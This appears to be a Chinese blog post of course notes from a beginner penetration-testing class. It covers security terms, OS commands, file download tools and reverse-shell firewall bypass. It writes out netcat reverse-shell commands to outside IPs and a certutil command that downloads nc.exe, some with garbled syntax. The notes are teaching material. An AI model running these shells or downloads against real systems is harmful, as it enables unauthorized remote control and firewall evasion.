第1天:基础入门-操作系统&名词&文件下载&反弹Shell&防火墙绕过-小迪安全学习

名词概念

前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK等

https://www.cnblogs.com/sunny11/p/13583083.html

基础案例1:操作系统-用途&命令&权限&用户&防火墙

  1. 个人计算机&服务器用机
  2. Windows&Linux常见命令

https://blog.csdn.net/weixin_43303273/article/details/83029138

  1. 文件权限&服务权限&用户权限等
  2. 系统用户&用户组&服务用户等

用户和用户组,管理权限,系统权限,Administration,User

  1. 自带防火墙出站&入站规则策略协议

实用案例1:文件上传下载-解决无图形化&解决数据传输

Linux:wget curl python ruby perl java等

Xshell连接服务器操作

wget+下载地址,ls查看当前目录文件

curl+下载地址 -o(重命名?) 名字.exe(举例)

Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等

[~]#棱角 ::Edge.Forum*

(棱角社区-输入地址 端口 文件名-获取powershell命令)

cd查看当前目录文件

注意在文件夹中是否有权限下载

实用案例2:反弹Shell命令-解决数据回显&解决数据通讯

数据回显:不知道命令是否执行成功,无交互式,需要回显

eg:useradd用户名passwd密码

(测试Linux系统添加用户或修改密码命令交互回显问题

数据通信:

结合案例1:防火墙绕过-正向连接(我是映射主机)&反向连接(我是监听主机)&内网服务器

  1. 内网:(eg家庭网,有出口)

虚拟机对于主机是一个内网

内网->xiaoyu8

xiaoyu8!->内网

内网->xiaoyu8

虚拟机nc -e cmd 47.75.212.155.5577将当前的cmd映射到外网地址端口去(传显)

外网主机nc lvvp 5577(监听)

达成通讯,外网就可以控制内网了

xiaoyu8!->内网

外网主机nc -e cmd 171.40.76.231.5577(在浏览器上搜索到ip)将当前的cmd映射到内网网地址端口去(传显)

虚拟机nc lvvp 5577(监听)

失败(因为)171这个地址不是虚拟机的地址,只是出口(网关)的地址

将映射ip端口换成192.168.46.157 5577

也失败(因为)这个192地址哪都有,外网主机会优先找自己的192地址,找不到该特定内网的192地址

解决:路由器端口映射转发

  1. 防火墙(箭头可看做映射)

准备两台外网主机

xiaoyu(xshell-aliyun)<->xiaoyu8(Windows主机)

xiaoyu防火墙->xiaoyu8(出站检测宽松)

xiaoyu8!-> xiaoyu防火墙(入站检测严格)

eg:老版本为ncat命令,具体命令格式均可在棱角社区查找

(xiaoyu)ncat www.xiaoyu8.com 5566 -e /bin/bash

(xiaoyu8)nc lvvp 5566

连接成功(xiaoyu8防火墙关闭状态)

打开了xiaoyu8防火墙之后,就连不上了

对于Windows主机来说,入站

防火墙(入站检测合格,出站检测宽松)

(xiaoyu8)nc -c cmd 47.94.236.117 5566

(xiaoyu)nc -lvvp 5566

连接成功

结合案例2:学会了有手就行-Fofa(搜集目标信息的)拿下同行Pikachu服务器(Web应用靶场)

文件下载&反弹Shell:

certutil -urlcache -split -f http://www.xiaodi8.com/nc.exe

nc -e cmd 47.75.212.155

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值